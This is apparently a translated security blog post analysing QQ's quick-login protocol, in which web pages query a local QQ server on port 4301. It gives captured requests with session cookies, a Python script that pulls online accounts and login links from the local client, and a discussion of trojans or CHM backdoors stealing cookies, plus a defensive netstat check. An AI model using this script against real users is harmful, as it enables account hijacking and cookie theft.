Objective
As we all know, Tencent used to implement QQ quick login with an ActiveX control, but today's quick login needs no browser control at all. So what clever means can a web page and a local application use to interact? In practice, the web page and the local application talk to each other over plain HTTP.
Quick Login Analysis
1. Quick Login Box Request
https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F%23
GET /cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F HTTP/1.1
Host: xui.ptlogin2.qq.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://buluo.qq.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Parameter description:
appid and daid identify the login service being used; QQ Zone and Interest Tribe (buluo), for example, use different values.
The Referer must be a .qq.com domain.
The response sets cookies; the key one is the pt_local_token field.
2. Get the QQ Users Currently Online
With the request below you can get the nicknames of the QQ accounts currently logged in on the machine. The request and response are as follows:
Request:
GET /pt_get_uins?callback=ptui_getuins_cb&r=0.70722284119771&pt_local_tk=-1335054259 HTTP/1.1
Host: localhost.ptlogin2.qq.com:4301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F
Cookie: pt_login_sig=sj7r2dqseouqfw5aai9jib644ms5einfscj5brwunqhiodeivxjxz9zfl9m7oixl; pt_serverip=28f40af17263c651; pt_local_token=-1335054259; pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726
Connection: keep-alive
Response:
var var_sso_uin_list=[{"account":"xxxxxxxxx","client_type":65793,"face_index":339,"gender":1,"nickname":"xxxxxxx","uin":"xxxxxxxxx","uin_flag":327156224}];ptui_getuins_cb(var_sso_uin_list);
In this request, notice the hostname and port localhost.ptlogin2.qq.com:4301. If you ping this hostname, you will find that it actually resolves to 127.0.0.1.
And 4301 is a port that QQ listens on.
Running netstat -ano shows that process ID 9284 is the one listening on port 4301.
Then tasklist | findstr "9284" confirms that it is indeed QQ.exe.
3. Click on Your Avatar
Be sure to note how the cookies change after clicking.
3.1 Cookie Change 1
Request:
GET /pt_get_st?clientuin=594675898&callback=ptui_getst_cb&r=0.9726726550496937&pt_local_tk=1692729835 HTTP/1.1
Host: localhost.ptlogin2.qq.com:4301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F%23
Cookie: pt_login_sig=f0eq6l9zhyn*YYDNJJSUDXGKL1TNFFDT*EK7T4UB5KN9UD*SAQHMENN7TBB2AUKB; pt_clientip=5c490e1116214b49; pt_serverip=aaa20af17263555d; pt_local_token=1692729835; uikey=2ff0398fd9f14f09281e369daf09808512791eccdd166e64088ee1a9bdfff26d; pt_guid_sig=a015dce2e00991b4181682d886b9b8dae892bd36dcb1afe3fcc2e93945a58cab; pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726; qrsig=ufypcl5fkmlpv-lqw1bonsykudz*equmiyxzvpk17ssfisshojzqnrozd3tlvx4h; pt2gguin=o0594675898; etk=; pt_recent_uins=046df7337fa517d209268b658c29ffa7eed66beaed9b66d86cb700aa5bdaf630fd18757dee2e15d69465910176e5cc0328bdfcc212f7fd96; ptisp=CTC; RK=6K58L1C0ZQ; ptnick_594675898=e4b880e7bc95e99d92e4b89d; ptcz=b13e557d01d48fb5f7b394288c304db80aea0ab3d62b31b492354e58b627211a
Connection: keep-alive
3.2 Cookie Change 2
Request:
GET /jump?clientuin=xxxxxx&keyindex=9&pt_aid=715030901&daid=371&u1=https%3A%2F%2Fbuluo.qq.com%2F%23&pt_local_tk=1240200107&pt_3rd_aid=0&ptopt=1&style=40 HTTP/1.1
Host: ssl.ptlogin2.qq.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3A%2F%2Fbuluo.qq.com%2F%23
Cookie: pt_login_sig=f0eq6l9zhyn*YYDNJJSUDXGKL1TNFFDT*EK7T4UB5KN9UD*SAQHMENN7TBB2AUKB; pt_clientip=5c490e1116214b49; pt_serverip=aaa20af17263555d; pt_local_token=1692729835; uikey=2ff0398fd9f14f09281e369daf09808512791eccdd166e64088ee1a9bdfff26d; pt_guid_sig=a015dce2e00991b4181682d886b9b8dae892bd36dcb1afe3fcc2e93945a58cab; pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726; qrsig=ufypcl5fkmlpv-lqw1bonsykudz*equmiyxzvpk17ssfisshojzqnrozd3tlvx4h; clientuin=594675898; pt2gguin=o0594675898; etk=; pt_recent_uins=046df7337fa517d209268b658c29ffa7eed66beaed9b66d86cb700aa5bdaf630fd18757dee2e15d69465910176e5cc0328bdfcc212f7fd96; ptisp=CTC; RK=6K58L1C0ZQ; ptnick_594675898=e4b880e7bc95e99d92e4b89d; ptcz=b13e557d01d48fb5f7b394288c304db80aea0ab3d62b31b492354e58b627211a
Connection: keep-alive
3.3 Login Redirect Link
The previous request returns the final login redirect link; pasting that link into the browser completes the login.
4. Simulated Login
Logging in with the redirect link obtained above succeeds. Based on the analysis of the flow above, the Python script below performs the simulated login:
import re
import requests

headers = {
    'Referer': 'https://buluo.qq.com/',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0',
}

# Step 1: load the quick-login box to obtain pt_local_token
s = requests.session()
r = s.get('https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1'
          '&s_url=https%3A%2F%2Fbuluo.qq.com%2F%23', headers=headers)
pt_local_token = r.cookies.get('pt_local_token')

# Step 2: ask the local QQ client which QQ accounts are online
r = s.get('https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_cb'
          '&r=0.70722284119771&pt_local_tk=' + pt_local_token, headers=headers)
pattern = re.compile(r'"uin":\s*"(\d+)"')
uin = pattern.findall(r.text)

if len(uin) > 0:
    # Step 3: obtain the cookies for the first online account
    s.get('https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin={}&callback=ptui_getst_cb'
          '&r=0.9726726550496937&pt_local_tk={}'.format(uin[0], pt_local_token), headers=headers)
    r = s.get('https://ssl.ptlogin2.qq.com/jump?clientuin={}&keyindex=9&pt_aid=715030901&daid=371'
              '&u1=https%3A%2F%2Fbuluo.qq.com%2F%23&pt_local_tk={}&pt_3rd_aid=0&ptopt=1&style=40'
              .format(uin[0], pt_local_token), headers=headers)
    # Step 4: pull the login redirect link out of the response
    pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    url = pattern.findall(r.text)
    print(url[0])
Reflection
QQ's quick login works by running a server inside the local QQ client, bound to 127.0.0.1, and letting the browser talk to that local server. To steal a cookie or a login link this way, an attacker first has to get a trojan onto your computer and have it interact with your QQ. On reflection, though, if the attacker can already plant a trojan on your computer, they could just as well take your QQ account password. So is there really anything to criticise in the way QQ communicates?
Personally, I don't think so! QQ does not verify the source of the request: any program that can send an HTTP request can interact with it and obtain a cookie. This greatly lowers the cost of an attack and makes malicious marketing very easy. Why does it lower the cost? Conventional QQ account theft means uploading a trojan, taking screenshots to capture your account and password, or logging your keystrokes. Such trojan behaviour is more easily caught by security software in the first place, and even once the password has been stolen, logging in from another computer is easily spotted by the QQ Security Center, which sends the user an off-site login warning, so profiting from a QQ account is not particularly easy.
But with the approach in this article, a trojan running on the user's computer can obtain the cookies very easily, and security software will not flag its requests. Once the trojan has the cookie, it can access your services and assets: posting in your QQ Zone automatically, reading your mail, viewing your albums and so on, and even changing your password does not help. There are many ways to profit, the cost is low, and it spreads easily. Why does it spread easily?
Imagine an attack scenario. A CHM file is normally a help document or an e-book, but it can also be used as a backdoor, and a very covert one. After a CHM backdoor interacts with QQ and obtains the cookie, it can post its own download link to QQ Zone and so on, and keep spreading.
In a word, the attack cost drops and the profit efficiency rises, which is exactly what the underground economy likes.
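As an added illustration of the netstat/tasklist check in section 2 and of the detection angle raised in this Reflection (this is not code from the original post), the following Python parses constructed netstat -ano and tasklist output to report which process owns a loopback listener and which non-browser processes hold connections to it. The sample rows, the image names other than QQ.exe, and the browser allow list are assumptions made for the example.

```python
import re
# Constructed sample output in the layout of Windows "netstat -ano" and "tasklist".
# PID 9284 and QQ.exe are the values named in the post; every other row is made up.
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    127.0.0.1:4301         0.0.0.0:0              LISTENING       9284
  TCP    127.0.0.1:51522        127.0.0.1:4301         ESTABLISHED     6120
  TCP    127.0.0.1:51530        127.0.0.1:4301         ESTABLISHED     7788
  TCP    [::1]:4301             [::]:0                 LISTENING       9284
  UDP    0.0.0.0:5353           *:*                                    1204
"""
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
QQ.exe                        9284 Console                    1    210,456 K
firefox.exe                   6120 Console                    1    412,008 K
hh.exe                        7788 Console                    1     18,240 K
"""
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}  # expected clients (assumption)
LOOPBACK = {"127.0.0.1", "::1"}

def split_endpoint(ep):
    """'127.0.0.1:4301' -> ('127.0.0.1', 4301); '[::1]:4301' -> ('::1', 4301)."""
    host, _, port = ep.rpartition(":")
    return host.strip("[]"), int(port)

def parse_netstat(text):
    """One (local_ip, local_port, remote_ip, remote_port, state, pid) tuple per TCP row."""
    rows = []
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) == 5 and parts[0] == "TCP":   # UDP rows carry no State column
            (lip, lport), (rip, rport) = split_endpoint(parts[1]), split_endpoint(parts[2])
            rows.append((lip, lport, rip, rport, parts[3], int(parts[4])))
    return rows

def parse_tasklist(text):
    """PID -> image name; the header and separator lines do not match the pattern."""
    row = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
    return {int(m.group(2)): m.group(1) for m in map(row.match, text.splitlines()) if m}
def listeners_on(port, rows):
    return sorted({r[5] for r in rows if r[4] == "LISTENING" and r[1] == port})
def clients_of(port, rows):
    return sorted({r[5] for r in rows if r[4] == "ESTABLISHED" and r[3] == port and r[2] in LOOPBACK})

def audit_local_port(port, netstat_text, tasklist_text):
    """Who owns the listener on `port`, and which non-browser processes are connected to it."""
    rows, names = parse_netstat(netstat_text), parse_tasklist(tasklist_text)
    owners = [names.get(p, "pid %d" % p) for p in listeners_on(port, rows)]
    clients = [names.get(p, "pid %d" % p) for p in clients_of(port, rows)]
    return owners, [c for c in clients if c.lower() not in BROWSERS]
```

On a live host, feed the two functions the real output of netstat -ano and tasklist; any connected process that is not a browser is the kind of local client the Reflection warns about and deserves a look.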
Finally
Follow the WeChat official account: Seven Night Security Blog
- Reply "1" to get the Python data analysis tutorial pack
- Reply "2" to get the complete Python Flask tutorial set
- Reply "3" to get a university machine learning tutorial
- Reply "4" to get the web crawler tutorial